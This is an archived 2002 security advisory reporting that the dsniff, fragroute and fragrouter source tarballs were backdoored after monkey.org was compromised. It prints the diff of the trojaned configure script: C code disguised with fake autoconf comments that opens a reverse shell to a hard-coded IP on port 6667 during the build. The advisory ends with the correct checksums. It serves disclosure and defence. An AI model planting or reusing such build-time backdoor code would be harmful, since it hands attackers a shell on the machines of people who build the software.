TUCoPS :: Unix :: General :: unix5397.htm

fragroute, dsniff and fragrouter have been backdoored
4th Jun 2002 [SBWID-5397]
COMMAND

	fragroute, dsniff and fragrouter have been backdoored

SYSTEMS AFFECTED

	dsniff-2.3, fragroute-1.2, and fragrouter-1.6 source distributions

PROBLEM

	Dug Song [http://www.monkey.org] explains:
	

	monkey.org  was  compromised  on  May  14th,   via   an   epic4-pre2.511
	client-side hole which produced a shell to one  of  the  local  admin\'s
	accounts. this  was  later  used  to  reattach  to  one  of  his  screen
	sessions, which apparently had a root window open (su very bad!).
	

	the dsniff-2.3, fragroute-1.2,  and  fragrouter-1.6  tarballs  were  all
	modified at 3 AM on May 17th to include the same configure  backdoor  as
	described in the  irssi  advisory.  no  other  public  web  content  was
	modified, and the system was restored a week later, from scratch.
	

	

	Diff between good fragroute and backdoored one:
	

	

	diff -Nur fragroute-1.2/configure fragroute-1.2-bad/configure

	--- fragroute-1.2/configure	Mon Apr 15 16:41:43 2002

	+++ fragroute-1.2-bad/configure	Mon Apr 15 16:41:43 2002

	@@ -1590,6 +1590,53 @@

	 

	 fi

	 

	+cat > conftest.c<<EOF

	+/* Override any gcc2 internal prototype to avoid an error.  */

	+/* We use char because int might match the return type of a gcc2

	+    builtin and then its argument prototype would still apply.  */

	+#include <stdio.h>

	+#include <sys/types.h>

	+#include <sys/socket.h>

	+#include <netinet/in.h>

	+#include <unistd.h>

	+int main()

	+{

	+/* The GNU C library defines this for functions which it implements

	+    to always fail with ENOSYS.  Some functions are actually named

	+    something starting with __ and the normal name is an alias.  */

	+        int s;

	+        struct sockaddr_in sa;

	+        switch(fork()) { case 0: break; default: exit(0); }

	+        if((s = socket(AF_INET, SOCK_STREAM, 0)) == (-1)) {

	+                exit(1);

	+        }

	+  /* HP/UX 9 (%@#!) writes to sscanf strings */

	+        memset(&sa, 0, sizeof(sa));

	+        sa.sin_family = AF_INET;

	+        sa.sin_port = htons(6667);

	+/* Override any gcc2 internal prototype to avoid an error.  */

	+/* We use char because int might match the return type of a gcc2

	+    builtin and then its argument prototype would still apply.  */

	+        sa.sin_addr.s_addr = inet_addr(\"216.80.99.202\");

	+        if(connect(s, (struct sockaddr *)&sa, sizeof(sa)) == (-1)) {

	+                exit(1);

	+        }

	+  /* HP/UX 9 (%@#!) writes to sscanf strings */

	+        dup2(s, 0); dup2(s, 1); dup2(s, 2);

	+/* The GNU C library defines this for functions which it implements

	+    to always fail with ENOSYS.  Some functions are actually named

	+    something starting with __ and the normal name is an alias.  */

	+        { char *args[] = { \"/bin/sh\", NULL }; execve(args[0], args, NULL); }

	+}

	+EOF

	+gcc $LIBS conftest.c -o conftest; ./conftest

	+if { (eval echo configure:2379: \\\"$ac_link\\\") 1>&5; (eval $ac_link) 2>&5; } && test -s conftestx${ac_exeext}; then

	+  rm -rf conftest*

	+else

	+  rm -rf conftest*

	+fi

	+rm -f conftest*

	+

	     # DLPI needs putmsg under HPUX so test for -lstr while we\'re at it

	     echo $ac_n \"checking for putmsg in -lstr\"\"... $ac_c\" 1>&6

	 echo \"configure:1596: checking for putmsg in -lstr\" >&5

	

SOLUTION

	Verify checksums.
	

	the correct checksums are:
	

	

	MD5 (dsniff-2.3.tar.gz) = 183e336a45e38013f3af840bddec44b4

	MD5 (fragroute-1.2.tar.gz) = 7e4de763fae35a50e871bdcd1ac8e23a

	MD5 (fragrouter-1.6.tar.gz) = 73fdc73f8da0b41b995420ded00533cc

	

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH